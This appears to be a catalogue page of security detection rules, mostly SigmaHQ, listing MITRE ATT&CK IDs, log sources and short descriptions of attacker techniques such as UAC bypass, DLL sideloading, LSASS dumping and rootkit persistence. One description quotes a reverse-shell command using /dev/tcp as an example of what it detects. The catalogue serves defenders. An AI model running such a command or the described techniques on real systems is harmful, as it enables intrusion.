SigmaHQ source
T1564
imProcessCreate

Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system

SigmaHQ source
T1070.006
imProcessCreate

Detects usage of the "touch" process in service file.

SigmaHQ source
T1546.013
imFileEvent

Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

SigmaHQ source
T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

SigmaHQ source
T1547
imFileEvent

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil

SigmaHQ source
T1003.002
imFileEvent

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

SigmaHQ source
T1027
imFileEvent

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

SigmaHQ source
T1564
imFileEvent

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

SigmaHQ source
T1593.003
imProcessCreate

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

SigmaHQ source
T1548
imFileEvent

Detects the creation of doas.conf file in linux host platform.

SigmaHQ source
T1053.003
imFileEvent

Detects creation of cron file or files in Cron directories which could indicates potential persistence.

SigmaHQ source
T1053.003
imFileEvent

Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.

SigmaHQ source
T1218T1055
DeviceImageLoadEvents

Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

SigmaHQ source
imFileEvent

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

SigmaHQ source
T1053.003
imFileEvent

Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method

SigmaHQ source
T1070
imFileEvent

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1505.003
imProcessCreate

Detects suspicious sub processes of web server processes

SigmaHQ source
T1083
imProcessCreate

Detects usage of "find" binary in a suspicious manner to perform discovery

SigmaHQ source
T1531
imProcessCreate

Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

SigmaHQ source
T1531
imProcessCreate

Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

JNDIExploit Pattern
sigma high
SigmaHQ source
T1190
imWebSession

Detects exploitation attempt using the JNDI-Exploit-Kit

SigmaHQ source
T1496
imProcessCreate

Detects command line parameters or strings often used by crypto miners

SigmaHQ source
T1059.004
imNetworkSession

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

SigmaHQ source
T1548.002T1574.001
DeviceImageLoadEvents

Attempts to load dismcore.dll after dropping it

evasion
SigmaHQ source
imProcessCreate

Detects usage of the "usermod" binary to add users add users to the root or suoders groups

SigmaHQ source
T1112T1562
imRegistry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using comctl32.dll to obtain system privileges

SigmaHQ source
imFileEvent

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd

SigmaHQ source
imFileEvent

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

SigmaHQ source
T1021.002T1021.003
imFileEvent

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

SigmaHQ source
T1021.002T1021.003
DeviceImageLoadEvents

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

SigmaHQ source
T1003.001
imFileEvent

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err

SigmaHQ source
T1059.005T1059.007
imFileEvent

Detects javaw.exe in AppData folder as used by Adwind / JRAT

SigmaHQ source
T1218T1003.001
DeviceImageLoadEvents

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

SigmaHQ source
T1047T1021.002
imFileEvent

Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

SigmaHQ source
T1059.005T1059.007
imFileEvent

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can d

SigmaHQ source
T1046
imFileEvent

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

SigmaHQ source
T1546.003
imRegistry

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

SigmaHQ source
T1216
imFileEvent

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

SigmaHQ source
T1053.003
imProcessCreate

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

SigmaHQ source
T1518.001
imProcessCreate

Detects usage of system utilities (only grep and egrep for now) to discover security software discovery

SigmaHQ source
T1562.001
imFileEvent

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o

SigmaHQ source
imFileEvent

Detects the pattern of a UAC bypass using Windows Event Viewer

SigmaHQ source
T1505.003
imWebSession

Detects common commands used in Windows webshells

SigmaHQ source
T1546.002
imFileEvent

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po

SigmaHQ source
T1567T1568.002T1572T1090T1102
imNetworkSession

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

SigmaHQ source
T1071.001
imWebSession

Detects suspicious malformed user agent strings in proxy logs

SigmaHQ source
T1569.002
imFileEvent

Detects default PsExec service filename which indicates PsExec service installation and execution

SigmaHQ source
T1566T1566.001T1574T1574.001
imFileEvent

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo

SigmaHQ source
T1567.002
imWebSession

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

SigmaHQ source
T1220
DeviceImageLoadEvents

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a

evasionwmi
SigmaHQ source
T1012
imRegistry

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s

SigmaHQ source
T1012
imRegistry

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi

SigmaHQ source
T1562.004
imProcessCreate

Detects disabling security tools

SigmaHQ source
T1562.001T1112
imRegistry

Detects NetNTLM downgrade attack

SigmaHQ source
T1059
DeviceImageLoadEvents

Detects processes loading modules related to PCRE.NET package

SigmaHQ source
T1059
imFileEvent

Detects processes creating temp files related to PCRE.NET package

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

SigmaHQ source
T1047T1021.002
DeviceImageLoadEvents

Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

wmi
Connection Proxy
sigma low
SigmaHQ source
T1090
imProcessCreate

Detects setting proxy configuration

SigmaHQ source
T1068T1190T1203
imProcessCreate

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre

SigmaHQ source
T1068T1190T1203
imProcessCreate

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag

Setuid and Setgid
sigma low
SigmaHQ source
T1548.001
imProcessCreate

Detects suspicious change of file privileges with chown and chmod commands

SigmaHQ source
T1083
imWebSession

Detects source code enumeration that use GET requests by keyword searches in URL strings

SigmaHQ source
T1190T1505.003
imFileEvent

Detects suspicious file type dropped by an Exchange component in IIS

SigmaHQ source
T1505.003
imFileEvent

Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder

SigmaHQ source
T1133
imFileEvent

Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

SigmaHQ source
T1528
imRegistry

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

Clear Linux Logs
sigma medium
SigmaHQ source
T1070.002
imProcessCreate

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

SigmaHQ source
T1115
imProcessCreate

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut

SigmaHQ source
T1105
imProcessCreate

Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server

SigmaHQ source
imProcessCreate

Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services

File Deletion
sigma low
SigmaHQ source
T1070.004
imProcessCreate

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

SigmaHQ source
T1565.001
imProcessCreate

Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity

SigmaHQ source
T1140
imProcessCreate

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

SigmaHQ source
T1592.004
imProcessCreate

Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance

SigmaHQ source
T1222.002
imProcessCreate

Detects usage of the 'chattr' utility to remove immutable file attribute.

SigmaHQ source
imProcessCreate

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th

SigmaHQ source
T1071.001
imProcessCreate

Detects a suspicious curl process start on linux with set useragent options

SigmaHQ source
T1016
imProcessCreate

Detects enumeration of local network configuration

SigmaHQ source
T1071.001T1197
imWebSession

Detects Bitsadmin connections to IP addresses instead of FQDN names

SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write an archive to disk

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)

SigmaHQ source
T1059.001
imFileEvent

Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context

SigmaHQ source
T1546.002
imFileEvent

Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

SigmaHQ source
T1574.001
imFileEvent

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is

SigmaHQ source
T1189T1204.002T1036.005
imWebSession

Detects a flashplayer update from an unofficial location

SigmaHQ source
T1574.001
imFileEvent

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

SigmaHQ source
imFileEvent

Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below

SigmaHQ source
T1140
imProcessCreate

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

SigmaHQ source
T1548.002
DeviceImageLoadEvents

Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%

evasion
SigmaHQ source
T1542.001
imFileEvent

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method

SigmaHQ source
T1003.002T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

SigmaHQ source
T1572T1021.001
imNetworkSession

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

SigmaHQ source
T1087.002
imRegistry

Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs

DD File Overwrite
sigma low
SigmaHQ source
T1485
imProcessCreate

Detects potential overwriting and deletion of a file using DD.

SigmaHQ source
T1190T1110
imWebSession

Detects suspicious user agent strings user by hack tools in proxy logs

SigmaHQ source
T1553.004
imProcessCreate

Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

SigmaHQ source
T1053.002
imProcessCreate

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu

SigmaHQ source
imProcessCreate

Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges

SigmaHQ source
T1014
imProcessCreate

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script

SigmaHQ source
T1548.002
imFileEvent

Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique

SigmaHQ source
T1003.001
imFileEvent

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials

SigmaHQ source
T1592.004T1552.001
imProcessCreate

Detects events with patterns found in commands used for reconnaissance on linux systems

SigmaHQ source
T1189
imWebSession

Detects XSS attempts injected via GET requests in access logs

SigmaHQ source
T1221
imWebSession

Detects SSTI attempts sent via GET requests in access logs

Creation of a Diagcab
sigma medium
SigmaHQ source
imFileEvent

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

Nohup Execution
sigma medium
SigmaHQ source
T1059.004
imProcessCreate

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

SigmaHQ source
T1222.002
imProcessCreate

Detects chmod targeting files in abnormal directory paths.

SigmaHQ source
T1059
imProcessCreate

Detects java process spawning suspicious children

SigmaHQ source
T1055T1218
imFileEvent

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

SigmaHQ source
T1574.001
DeviceImageLoadEvents

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

SigmaHQ source
T1105
imFileEvent

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder

SigmaHQ source
T1546T1027
imFileEvent

Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks

SigmaHQ source
T1105T1567.002
imNetworkSession

Detects an executable that isn't dropbox but communicates with the Dropbox API

SigmaHQ source
T1059.004T1036
imProcessCreate

Detects suspicious interactive bash as a parent to rather uncommon child processes

SigmaHQ source
T1190T1505.003
imFileEvent

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target

SigmaHQ source
T1059.004
imProcessCreate

Detects the usage of the unsafe bpftrace option

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users

SigmaHQ source
T1219.002
imFileEvent

Detects the creation of log files during a TeamViewer remote session

SigmaHQ source
T1219.002
imFileEvent

TeamViewer_Desktop.exe is create during install

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of a new office macro files on the systems

SigmaHQ source
T1548
imProcessCreate

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

SigmaHQ source
T1548.002T1546.001
imRegistry

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3

evasionpersistence
SigmaHQ source
T1053
imFileEvent

Detects the creation of tasks from processes executed from suspicious locations

SigmaHQ source
T1547.009
imFileEvent

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in

SigmaHQ source
T1486
imFileEvent

Ransomware create txt file in the user Desktop

SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by crypto miners in proxy logs

SigmaHQ source
T1027
imProcessCreate

Detects usage of base64 utility to decode arbitrary base64-encoded text

SigmaHQ source
T1219.002
imFileEvent

Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder

SigmaHQ source
T1071.001
imWebSession

Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.

SigmaHQ source
T1018
imProcessCreate

Detects the enumeration of other remote systems.

SigmaHQ source
T1195T1195.001
imFileEvent

Detects Octopus Scanner Malware.

SigmaHQ source
T1123
imRegistry

Potential adversaries accessing the microphone and webcam in an endpoint.

PwnDrp Access
sigma critical
SigmaHQ source
T1071.001T1102.001T1102.003
imWebSession

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

SigmaHQ source
T1012T1552.002
imRegistry

Detects handles requested to SAM registry hive

SigmaHQ source
T1012
imRegistry

Detects handle requests and access operations to specific registry keys to calculate the SysKey

SigmaHQ source
T1071.001
imWebSession

Detects Windows PowerShell Web Access

SigmaHQ source
T1071.001
imWebSession

Detects WebDav DownloadCradle

SigmaHQ source
T1546.003
DeviceImageLoadEvents

Detects WMI command line event consumers

persistencewmi
SigmaHQ source
T1546.003
imFileEvent

Detects file writes of WMI script event consumer

SigmaHQ source
T1496
imNetworkSession

Detects process connections to a Monero crypto mining pool

SigmaHQ source
T1082
imProcessCreate

Detects system information discovery commands

Yara-Rules source

Detection of Virtual Appliances through the use of WMI for use of evasion.

communityevasionwmi
Yara-Rules source

Rule to detect DarkEYEv3 encrypted executables (often malware)

community